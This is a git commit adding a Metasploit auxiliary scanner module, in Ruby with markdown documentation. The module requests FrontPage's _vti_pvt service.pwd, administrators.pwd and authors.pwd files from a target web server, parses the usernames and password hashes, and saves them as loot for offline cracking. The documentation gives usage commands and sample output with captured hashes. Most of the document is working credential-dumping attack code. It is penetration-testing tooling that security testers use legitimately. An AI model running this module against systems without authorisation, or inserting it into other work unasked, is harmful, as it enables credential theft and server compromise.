Land #10534, Add FrontPage Credential Dump Module

This module downloads and parses the '_vti_pvt/service.pwd', '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files used by FrontPage to find credentials.
2018-09-22 04:13:24 +00:00 · 2018-09-22 04:13:24 +00:00 · 56b01dcf00
parent 5f8c026c78 02b2559953
commit 56b01dcf00
2 changed files with 184 additions and 0 deletions
--- a/modules/auxiliary/scanner/http/frontpage_credential_dump.md
+++ b/modules/auxiliary/scanner/http/frontpage_credential_dump.md
@ -0,0 +1,70 @@
+## Description
+When Microsoft FrontPage is run on a non-IIS web server it creates encrypted password files in the _vti_pvt folder. When this folder is accessible, these files can be downloaded and parsed to obtain encrytped passwords. These encrypted passwords can then be cracked offline and used to gain further access to the server.
+
+Affected Files:
+
+ * administrators.pwd
+ * authors.pwd
+ * service.pwd
+
+Citations:
+ * https://msdn.microsoft.com/en-us/library/cc750050.aspx
+ * http://sparty.secniche.org/
+
+## Usage
+```
+use auxiliary/scanner/http/frontpage_credential_dump
+set RHOSTS 10.10.10.10
+set TARGETURI about
+run
+```
+
+## Standard Output
+```
+msf auxiliary(scanner/http/frontpage_credential_dump) > run
+
+[+] 10.10.10.10 - service.pwd
+[+] 10.10.10.10 - administrators.pwd
+[+] 10.10.10.10 - authors.pwd
+
+FrontPage Credentials
+=====================
+
+ Source          Username    Password Hash
+ ------          --------    -------------
+ Administrators  e-scan.com  xMyvw4d3c1oWY
+ Authors         e-scan.com  xMyvw4d3c1oWY
+ Service         e-scan.com  jLAsITPJ8AsaR
+
+[*] Credentials saved in: /root/.msf4/loot/20180921124147_default_10.10.10.10_frontpage.creds_096592.txt
+
+```
+
+## Verbose Output
+```
+msf auxiliary(scanner/http/frontpage_credential_dump) > run
+
+[*] Requesting: /about/_vti_pvt/service.pwd
+[*] Found /about/_vti_pvt/service.pwd.
+[*] Found FrontPage credentials.
+[+] 10.10.10.10 - service.pwd
+[*] Requesting: /about/_vti_pvt/administrators.pwd
+[*] Found /about/_vti_pvt/administrators.pwd.
+[*] Found FrontPage credentials.
+[+] 10.10.10.10 - administrators.pwd
+[*] Requesting: /about/_vti_pvt/authors.pwd
+[*] Found /about/_vti_pvt/authors.pwd.
+[*] Found FrontPage credentials.
+[+] 10.10.10.10 - authors.pwd
+
+FrontPage Credentials
+=====================
+
+ Source          Username    Password Hash
+ ------          --------    -------------
+ Administrators  e-scan.com  xMyvw4d3c1oWY
+ Authors         e-scan.com  xMyvw4d3c1oWY
+ Service         e-scan.com  jLAsITPJ8AsaR
+
+[*] Credentials saved in: /root/.msf4/loot/20180921124828_default_10.10.10.10_frontpage.creds_090555.txt
+```
--- a/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
+++ b/modules/auxiliary/scanner/http/frontpage_credential_dump.rb
@ -0,0 +1,114 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'FrontPage .pwd File Credential Dump',
+      'Description'    => %q{
+        This module downloads and parses the '_vti_pvt/service.pwd',
+        '_vti_pvt/administrators.pwd', and '_vti_pvt/authors.pwd' files on a FrontPage
+         server to find credentials.
+      },
+      'References'     =>
+        [
+          [ 'PACKETSTORM', '11556'],
+          [ 'URL', 'https://insecure.org/sploits/Microsoft.frontpage.insecurities.html'],
+          [ 'URL', 'http://sparty.secniche.org/' ]
+        ],
+      'Author'         =>
+        [
+          'Aditya K Sood @adityaksood', # Sparty tool'
+          'Stephen Haywood @averagesecguy' # Metasploit module'
+        ],
+      'License'        => MSF_LICENSE,
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path', '/'])
+    ])
+  end
+
+
+  def get_pass_file(fname)
+    uri = normalize_uri(target_uri.path, '_vti_pvt', fname)
+
+    vprint_status("Requesting: #{uri}")
+    res = send_request_cgi({
+      'uri' => uri,
+      'method' => 'GET',
+    })
+
+    unless res.code == 200
+      vprint_status("File #{uri} not found.")
+      return nil
+    end
+
+    vprint_status("Found #{uri}.")
+
+    unless res.body.lines.first.chomp == '# -FrontPage-'
+      vprint_status("File does not contain FrontPage credentials.")
+      vprint_status(res.body)
+      return nil
+    end
+
+    vprint_status("Found FrontPage credentials.")
+    return res.body
+  end
+
+  def run_host(ip)
+    files = ['service.pwd', 'administrators.pwd', 'authors.pwd']
+    creds = []
+
+    files.each do |filename|
+      source = filename.chomp('.pwd').capitalize
+      contents = get_pass_file(filename)
+
+      next if contents.nil?
+
+      print_good("#{ip} - #{filename}")
+
+      contents.each_line do |line|
+        next if line.chomp == '# -FrontPage-'
+        user = line.chomp.split(':')[0]
+        pass = line.chomp.split(':')[1]
+
+        creds << [source, user, pass]
+      end
+    end
+
+    cred_table = Rex::Text::Table.new(
+      'Header'  => 'FrontPage Credentials',
+      'Indent'  => 1,
+      'Columns' => ['Source', 'Username', 'Password Hash']
+    )
+
+    creds.each do |c|
+      cred_table << c
+    end
+
+    print_line
+    print_line("#{cred_table}")
+
+    loot_name     = 'frontpage.creds'
+    loot_type     = 'text/csv'
+    loot_filename = 'frontpage_creds.csv'
+    loot_desc     = 'FrontPage Credentials'
+
+    p = store_loot(
+      loot_name,
+      loot_type,
+      rhost,
+      cred_table.to_csv,
+      loot_filename,
+      loot_desc)
+
+    print_status "Credentials saved in: #{p}"
+  end
+end